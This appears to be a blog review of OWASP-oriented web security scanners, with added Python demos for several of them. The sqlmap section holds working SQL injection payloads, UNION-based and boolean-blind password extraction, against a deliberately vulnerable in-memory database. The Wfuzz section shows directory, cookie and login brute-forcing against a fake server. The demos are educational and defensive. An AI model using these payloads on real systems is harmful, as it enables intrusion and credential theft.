The Open Web Application Security Project (OWASP) is a non-profit foundation that publishes free, vendor-neutral guidance on application security, best known for the OWASP Top 10, a list of the most critical web application risks. It gives a business an unbiased starting point for deciding which vulnerability classes to focus on, and OWASP-aligned testing tools have helped find and fix weaknesses on many thousands of websites over the years.
It makes sense to look for a scanner that quickly gives you a list of vulnerabilities in your application mapped to the OWASP Top 10. That way you know which fixes to push first and which can wait without serious business impact. One caveat before the list: the Top 10 is a risk-awareness document rather than a test checklist, and some of its categories (insecure design, for example) cannot be confirmed by any automated scanner, so treat scanner output as a starting point, not as proof of coverage.
1. Zed Attack Proxy (ZAP)
Developed by the OWASP community, ZAP is the natural starting point if you need an open-source tool. It runs on Windows, macOS, and Linux, and can be used as an intercepting proxy during development as well as an automated scanner against a deployed application. It finds a majority of common vulnerabilities, but you will need some technical expertise to interpret the results and turn them into fixes. Typical alerts include:
- Application error disclosure
- Cookie without HttpOnly flag
- Missing anti-CSRF tokens and security headers
- Private IP disclosure
- Session ID in URL rewrite
- SQL injection
- Cross-site scripting (XSS)
Our thoughts: this open-source tool suits businesses with a solid technical team and prior experience with the OWASP Top 10.
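To make the ZAP alerts above concrete, here is an added example (not ZAP's own code) that re-implements four of its passive-scan checks over a constructed HTTP response: missing security headers, a cookie set without HttpOnly, a session ID rewritten into the URL, and private IP disclosure. The header set, the session parameter names and the sample response are assumptions made for the demo; ZAP's real passive scanner checks considerably more.

```python
# Added example (not ZAP's own code): four of ZAP's passive-scan checks
# re-implemented over a constructed HTTP response, so the alerts listed above
# can be seen being raised. Header set and private-IP ranges are assumptions.
import re
from dataclasses import dataclass

# Assumption: this subset of response headers is what we require on HTML
# responses; ZAP's passive scanner checks more.
EXPECTED_HEADERS = {
    "content-security-policy": "Missing Content-Security-Policy header",
    "strict-transport-security": "Missing Strict-Transport-Security header",
    "x-content-type-options": "Missing X-Content-Type-Options header",
}

# RFC 1918 and loopback ranges count as "private IP disclosure".
PRIVATE_IP = re.compile(
    r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3}"
    r"|127\.\d{1,3}\.\d{1,3}\.\d{1,3})\b"
)

# Session identifiers carried in the query string or as a ;jsessionid path parameter.
SESSION_IN_URL = re.compile(r"[?&;](?:jsessionid|phpsessid|sessionid|sid)=", re.I)


@dataclass
class Response:
    url: str
    status: int
    headers: list          # (name, value) pairs; Set-Cookie may repeat
    body: str


def passive_checks(resp: Response) -> list:
    """Return alert strings in the spirit of ZAP's alert names."""
    alerts = []
    present = {name.lower() for name, _ in resp.headers}

    # 1. Missing security headers
    for header, alert in EXPECTED_HEADERS.items():
        if header not in present:
            alerts.append(alert)

    # 2. Cookie set without the HttpOnly attribute (one alert per cookie)
    for name, value in resp.headers:
        if name.lower() == "set-cookie":
            cookie_name = value.split("=", 1)[0].strip()
            attrs = {a.strip().lower() for a in value.split(";")[1:]}
            if "httponly" not in attrs:
                alerts.append(f"Cookie without HttpOnly flag: {cookie_name}")

    # 3. Session ID in URL rewrite
    if SESSION_IN_URL.search(resp.url):
        alerts.append("Session ID in URL rewrite")

    # 4. Private IP disclosure anywhere in headers or body
    text = resp.body + " " + " ".join(value for _, value in resp.headers)
    for ip in sorted(set(PRIVATE_IP.findall(text))):
        alerts.append(f"Private IP disclosure: {ip}")

    return alerts


# Constructed sample response; not captured from any real site.
SAMPLE = Response(
    url="https://shop.example/cart;jsessionid=ABC123?item=42",
    status=200,
    headers=[
        ("Content-Type", "text/html"),
        ("Set-Cookie", "session=abc; Path=/; Secure"),
        ("Set-Cookie", "theme=dark; Path=/; HttpOnly"),
        ("X-Content-Type-Options", "nosniff"),
        ("X-Backend", "10.0.3.17"),
    ],
    body="<html>Served by cache node 192.168.1.9</html>",
)


def scan_sample() -> list:
    return passive_checks(SAMPLE)


if __name__ == "__main__":
    for alert in scan_sample():
        print(alert)
```

Running it against the sample raises six alerts: two missing headers, the `session` cookie without HttpOnly (the `theme` cookie passes), the `;jsessionid=` rewrite, and the two internal addresses leaked in a header and in the body. Passive checks like these never send an extra request, which is why ZAP can run them safely against production traffic while the active scanner is reserved for test environments.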
2. Mister Scanner
Abbey from Mister Scanner is a popular commercial scanner for finding vulnerabilities on your website. Its testing coverage is on par with ZAP, but the simple reports make it a good choice for small and medium businesses. Mister Scanner looks for cross-site scripting, SQL injection, cross-site request forgery and the other OWASP Top 10 weaknesses that a scanner can detect, and each finding comes with a recommendation on how to close the hole.
- OWASP Top 10 coverage
- Simple reports
- Usable by non-technical staff
- Weekly security updates
- Operated by 130+ ethical hackers
Our thoughts: pick this scanner if you do not know where to start with web security; the vendor provides complete guidance.
3. SonarQube
SonarQube is a static analysis (SAST) platform with an open-source Community edition. Unlike ZAP, it does not probe a running application: it reads the source code, flags the OWASP Top 10 issues it can recognise at the code level, and also reports on general code quality. SonarQube itself is written in Java but analyses more than 22 programming languages. The web dashboard lets site owners pick priority issues, which are colour-coded red, yellow and green. Weakness classes it reports include:
- Cross-site scripting
- Denial of Service (DoS) attacks
- HTTP response splitting
- Memory corruption
- SQL injection
Our thoughts: as with ZAP, you will need technical expertise to act on the results, but this is the tool we recommend for source-code analysis.
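To show what a code-level finding such as "SQL injection" means in a static analyser, here is an added example, not SonarQube's own rule engine, of a tiny SAST-style check written with Python's `ast` module. It looks for SQL assembled from non-literal values (concatenation, `%` formatting, f-strings, `.format()`) that reaches a database sink, resolving one step of assignment so `query = ...; cursor.execute(query)` is still caught. The sink names, the taint rules and the sample module are assumptions made for the demo; a real analyser does full data-flow tracking across calls and files.

```python
# Added example, not SonarQube's own rule engine: a tiny SAST-style check
# written with Python's ast module, in the spirit of the "SQL built from
# untrusted data" rules a static analyser ships. Sink names and the taint
# rules below are assumptions chosen for the demo.
import ast

# Methods treated as SQL sinks (DB-API cursor/connection methods).
SINKS = {"execute", "executemany", "executescript"}


def is_dynamic_sql(node) -> bool:
    """True when the expression assembles SQL from something other than literals."""
    if isinstance(node, ast.Constant):
        return False
    if isinstance(node, ast.JoinedStr):                       # f"... {x} ..."
        return any(isinstance(v, ast.FormattedValue) for v in node.values)
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Mod)):
        return is_dynamic_sql(node.left) or is_dynamic_sql(node.right)
    if isinstance(node, ast.Call):                            # "...".format(x)
        func = node.func
        return isinstance(func, ast.Attribute) and func.attr == "format"
    # Names, attributes, other calls: origin unknown, treat as tainted.
    return True


class SqlSinkFinder(ast.NodeVisitor):
    """Walks a module, tracking simple assignments so execute(query) can be
    resolved one step back to the expression that built `query`."""

    def __init__(self):
        self.findings = []      # (line, message)
        self._scopes = [{}]     # name -> last assigned expression, per scope

    def visit_FunctionDef(self, node):
        self._scopes.append({})
        self.generic_visit(node)
        self._scopes.pop()

    def visit_Assign(self, node):
        for target in node.targets:
            if isinstance(target, ast.Name):
                self._scopes[-1][target.id] = node.value
        self.generic_visit(node)

    def _resolve(self, node):
        for scope in reversed(self._scopes):
            if isinstance(node, ast.Name) and node.id in scope:
                node = scope[node.id]
        return node

    def visit_Call(self, node):
        func = node.func
        if isinstance(func, ast.Attribute) and func.attr in SINKS and node.args:
            if is_dynamic_sql(self._resolve(node.args[0])):
                self.findings.append(
                    (node.lineno,
                     f"SQL passed to {func.attr}() is built at runtime; "
                     "use a parameterized query")
                )
        self.generic_visit(node)


def find_sql_injection(source: str) -> list:
    tree = ast.parse(source)
    finder = SqlSinkFinder()
    finder.visit(tree)
    return finder.findings


# Constructed sample module: two vulnerable lookups and two safe ones.
SAMPLE_SOURCE = '''
import sqlite3

def find_user_concat(conn, name):
    query = "SELECT * FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()

def find_user_fstring(conn, name):
    return conn.execute(f"SELECT * FROM users WHERE name = '{name}'").fetchall()

def find_user_safe(conn, name):
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()

COUNT_SQL = "SELECT count(*) FROM users"

def count_users(conn):
    return conn.execute(COUNT_SQL).fetchone()[0]
'''


if __name__ == "__main__":
    for line, message in find_sql_injection(SAMPLE_SOURCE):
        print(f"line {line}: {message}")
```

On the sample module the check reports lines 6 and 9 (the concatenated and f-string queries) and stays quiet on the parameterized query and on the module-level constant. This is exactly the trade-off of static analysis that the review above alludes to: no running application is needed, but the rule has to understand the code's data flow, and anything it cannot trace (here, a function parameter) is conservatively treated as untrusted, so a human still has to confirm each result.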
4. Detectify
If you are an established business and ready to pay a little extra for security testing, Detectify is a good companion. Priced from $29 at the time of writing this review, it covers most of what you need from an OWASP-oriented scanner. Detectify is a subscription product that periodically scans your web assets for OWASP Top 10 issues and presents the results on a cloud-based platform with a security overview.
- OWASP Top 10 testing
- Cloud-based platform
- Updated CVE library
- Used by top businesses
Our thoughts: there are a dozen OWASP-oriented testing products, but Detectify stands out for its focus on continuous scanning.
5. sqlmap
Ideally this list would only include tools that test for the whole OWASP Top 10; sqlmap is the exception. Injection flaws are a nightmare for most businesses: they lead to data theft, loss of reputation and serious website downtime. sqlmap is a free, open-source tool that has helped thousands of small businesses deal with the problem. It detects and exploits six SQL injection techniques:
- Boolean-based blind
- Error-based
- Stacked queries
- Time-based blind
- UNION query
- Out-of-band
Our thoughts: even if you have the world's best OWASP testing product, sqlmap will still add value to your security testing.
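The techniques in the list above are easiest to understand by doing them by hand once. The following added example, not sqlmap's own code, sets up a deliberately vulnerable product lookup over an in-memory SQLite database and walks through two of the six techniques offline: a UNION query that pulls another table's rows into the visible result, and boolean-based blind extraction, which recovers a secret one character at a time from nothing more than a "found"/"not found" answer. It ends with the parameterized query that stops both. The tables, data, request counter and the `VulnApp` stand-in are all constructed for the demo.

```python
# Added example, not sqlmap's own code: a deliberately vulnerable lookup over
# an in-memory SQLite database, followed by hand-written versions of two of
# the techniques sqlmap automates, UNION query and boolean-based blind
# extraction, plus the parameterized query that stops both. Table names,
# data and the request counter are constructed for the demo.
import sqlite3


class VulnApp:
    """Stand-in for a web app whose /product?id= handler concatenates input."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript("""
            CREATE TABLE products (id INTEGER, name TEXT);
            INSERT INTO products VALUES (1, 'lamp'), (2, 'desk');
            CREATE TABLE users (name TEXT, pw TEXT);
            INSERT INTO users VALUES ('admin', 's3cret');
        """)
        self.requests = 0       # how many "HTTP requests" an attack needed

    def product_names(self, product_id: str) -> list:
        """Vulnerable: user input spliced straight into the SQL text."""
        self.requests += 1
        sql = f"SELECT name FROM products WHERE id = {product_id}"
        return [row[0] for row in self.conn.execute(sql).fetchall()]

    def product_exists(self, product_id: str) -> bool:
        """What a boolean-blind attacker sees: only 'found' or 'not found'."""
        return bool(self.product_names(product_id))

    def product_names_safe(self, product_id: str) -> list:
        """Fixed: the value travels as a bound parameter, never as SQL."""
        self.requests += 1
        sql = "SELECT name FROM products WHERE id = ?"
        return [row[0] for row in self.conn.execute(sql, (product_id,)).fetchall()]


def union_attack(app: VulnApp) -> list:
    """UNION query: append a SELECT with the same column count to pull
    another table's rows into the visible result."""
    return app.product_names("0 UNION SELECT pw FROM users")


def blind_extract(app: VulnApp, column: str, table: str, max_len: int = 32) -> str:
    """Boolean-based blind: recover a value one character at a time by asking
    yes/no questions, with a binary search over printable ASCII per position."""
    value = ""
    for pos in range(1, max_len + 1):
        if not app.product_exists(
                f"1 AND length((SELECT {column} FROM {table} LIMIT 1)) >= {pos}"):
            break                                   # ran off the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (f"1 AND unicode(substr((SELECT {column} FROM {table} LIMIT 1),"
                     f" {pos}, 1)) > {mid}")
            if app.product_exists(probe):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


if __name__ == "__main__":
    app = VulnApp()
    print("UNION:", union_attack(app))
    print("blind:", blind_extract(app, "pw", "users"), "in", app.requests, "requests")
    print("safe :", app.product_names_safe("0 UNION SELECT pw FROM users"))
```

The UNION payload reads the password in a single request; the blind extraction needs roughly eight requests per character, which is why sqlmap prefers UNION and error-based techniques when they are available and falls back to blind ones only when the page leaks nothing but a yes/no difference. Stacked queries cannot be shown with this harness because Python's `sqlite3` refuses more than one statement per `execute()` call, which is itself a useful reminder that the database driver, not just the query, decides which techniques are reachable.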
6. Qualys WAS
Qualys Web Application Scanning is a close competitor to Detectify. It is expensive but efficient and can make your life much easier. Originally developed to test for XSS, SQLi and CSRF, it now covers hundreds of vulnerability classes including the OWASP Top 10 and the CWE/SANS Top 25. It is fully cloud-based, so there is nothing to install.
- OWASP Top 10 coverage
- Tests IoT and mobile apps
- Online platform
- Global vulnerability repository
Our thoughts: Qualys is a testing tool for large organisations with large application estates.
7. Wfuzz
The team was divided on whether Wfuzz belonged on the list. It does not cover all of the OWASP Top 10, but it excels at one thing: brute-force discovery and fuzzing. Written in Python, it lets you substitute a wordlist into any part of an HTTP request, which is how you hunt for hidden directories, parameters, credentials and injection points for SQL injection, XSS and LDAP injection. There is no graphical interface, so you will need command-line skills to use it.
- Authentication support
- Cookies fuzzing
- Multiple injection points
- Support for proxies and SOCKS
Our thoughts: Wfuzz will help you brute-force and fuzz every kind of injection point, and it's free.
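To show what "multiple injection points" and "cookies fuzzing" mean in practice, here is an added example, not Wfuzz's own code, of a minimal fuzzer built on the same model: `FUZZ`/`FUZ2Z` markers anywhere in the request template, one wordlist per marker, and results filtered by status code. It runs against an in-process stand-in for a web server so it works offline; the target routes, wordlists and credentials are constructed, and the Wfuzz command lines quoted in the docstrings are the approximate equivalents, not output from the tool.

```python
# Added example, not Wfuzz's own code: a minimal fuzzer built on Wfuzz's
# model (FUZZ/FUZ2Z markers anywhere in the request, one wordlist per marker,
# hide results by status code), run against an in-process stand-in for a
# web server. The target routes, wordlists and credentials are constructed.
import itertools
from urllib.parse import parse_qs

MARKERS = ["FUZZ", "FUZ2Z", "FUZ3Z"]


def fake_server(method, path, headers, body):
    """Constructed target: a hidden backup path, an admin page gated on a
    cookie, and a login form. Returns (status, body) like a real response."""
    route = path.split("?", 1)[0]
    if route == "/admin":
        if headers.get("Cookie") == "role=admin":
            return 200, "admin console"
        return 302, "redirect to /login"
    if route == "/backup":
        return 403, "forbidden"
    if route == "/login" and method == "POST":
        form = parse_qs(body)
        if form.get("user") == ["alice"] and form.get("pass") == ["summer2024"]:
            return 302, "redirect to /home"
        return 401, "bad credentials"
    return 404, "not found"


def fuzz(request, wordlists, send, hide_codes=()):
    """Substitute every marker in the request template with each combination
    of words, send it, and keep responses whose status is not hidden.
    Returns (payloads, status, response length) per kept response."""
    hits = []
    for combo in itertools.product(*wordlists):
        def fill(text):
            for marker, word in zip(MARKERS, combo):
                text = text.replace(marker, word)
            return text
        headers = {fill(k): fill(v) for k, v in request.get("headers", {}).items()}
        status, resp_body = send(request["method"], fill(request["path"]),
                                 headers, fill(request.get("body", "")))
        if status not in hide_codes:
            hits.append((combo, status, len(resp_body)))
    return hits


def directory_discovery():
    """Roughly: wfuzz -w dirs.txt --hc 404 http://target/FUZZ"""
    request = {"method": "GET", "path": "/FUZZ"}
    dirs = ["admin", "backup", "images", "uploads"]
    return fuzz(request, [dirs], fake_server, hide_codes=(404,))


def cookie_fuzz():
    """Roughly: wfuzz -w roles.txt -H "Cookie: role=FUZZ" --hc 302 http://target/admin"""
    request = {"method": "GET", "path": "/admin", "headers": {"Cookie": "role=FUZZ"}}
    roles = ["guest", "user", "admin"]
    return fuzz(request, [roles], fake_server, hide_codes=(302,))


def credential_bruteforce():
    """Roughly: wfuzz -w users.txt -w passwords.txt -d "user=FUZZ&pass=FUZ2Z" --hc 401 http://target/login"""
    request = {"method": "POST", "path": "/login",
               "headers": {"Content-Type": "application/x-www-form-urlencoded"},
               "body": "user=FUZZ&pass=FUZ2Z"}
    users = ["admin", "alice"]
    passwords = ["password", "summer2024", "letmein"]
    return fuzz(request, [users, passwords], fake_server, hide_codes=(401,))


if __name__ == "__main__":
    print(directory_discovery())
    print(cookie_fuzz())
    print(credential_bruteforce())
```

The three runs illustrate the workflow: directory discovery hides the 404s and surfaces `/admin` and `/backup`; cookie fuzzing on the `/admin` path hides the redirects and leaves only the `role=admin` value that returned a 200; and the two-wordlist login run tries every user/password combination and keeps only the one that did not come back 401. The status and response-length columns are what you filter on in the real tool, since a brute-force hit often differs from a miss only by its size.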
Do you know any other OWASP testing tools? Leave them in the comments below with reasons on why we should include them.